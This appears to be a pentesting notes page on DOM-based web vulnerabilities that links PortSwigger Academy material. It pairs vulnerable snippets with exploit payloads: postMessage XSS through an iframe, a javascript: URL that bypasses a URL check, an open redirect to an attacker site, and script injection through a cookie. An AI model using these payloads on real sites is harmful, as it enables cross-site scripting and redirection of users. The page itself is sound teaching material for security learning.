DOM-based

• PortSwigger - Web Security Academy - DOM-based

Taint-flow

Sources Sinks

Web messages

• PortSwigger - Web Security Academy - Controlling the web message source

If a website handles web message in an unsafe way, e.g. by not verifying the origin, code in the event listener become potential sinks.

Example 1 (no validation)

Vulnerable code

<script>
    window.addEventListener('message', function(e) {
        document.getElementById('name').innerHTML = e.data;
    })
</script>

Exploit

<iframe src="https://vulnerable-site.com" onload="this.contentWindow.postMessage('<img src=x onerror=print()>','*')">

Example 2 (broken URL validation)

Vulnerable code

<script>
	window.addEventListener('message', function(e) {
	    var url = e.data;
	    if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
	        location.href = url;
	    }
	}, false);
</script>

Exploit

<iframe src="https://vulnerable-site.com" onload="this.contentWindow.postMessage('javascript:print()//https:','*')">

Open redirect

• PortSwigger - Web Security Academy - DOM-based open redirection

Vulnerable code

<a href='#' onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1]; else location.href = "/"'>Back</a>

Exploit

https://vulnerable-website.com/?url=https://attacker-site.com

Cookie manipulation

• PortSwigger - Web Security Academy - DOM-based cookie manipulation

Vulnerable code

<a href='https://website.com/product?productId=2'>Last viewed product</a>

<script>
	document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>

Exploit

<iframe src="https://website.com/product?productId=2#'><script>print()</script>"></iframe>

DOM clobbering

• PortSwigger - Web Security Academy - DOM clobbering

Other DOM-based vulnerabilities

• PortSwigger - Web Security Academy - DOM-based JavaScript injection

• PortSwigger - Web Security Academy - DOM-based document-domain manipulation

• PortSwigger - Web Security Academy - DOM-based WebSocket-URL poisoning

• PortSwigger - Web Security Academy - DOM-based link manipulation

• PortSwigger - Web Security Academy - Web message manipulation

• PortSwigger - Web Security Academy - DOM-based Ajax request-header manipulation

• PortSwigger - Web Security Academy - DOM-based local file-path manipulation

• PortSwigger - Web Security Academy - DOM-based client-side SQL injection

• PortSwigger - Web Security Academy - DOM-based HTML5-storage manipulation

• PortSwigger - Web Security Academy - DOM-based client-side XPath injection

• PortSwigger - Web Security Academy - DOM-based client-side JSON injection

• PortSwigger - Web Security Academy - DOM-data manipulation

• PortSwigger - Web Security Academy - DOM-based denial of service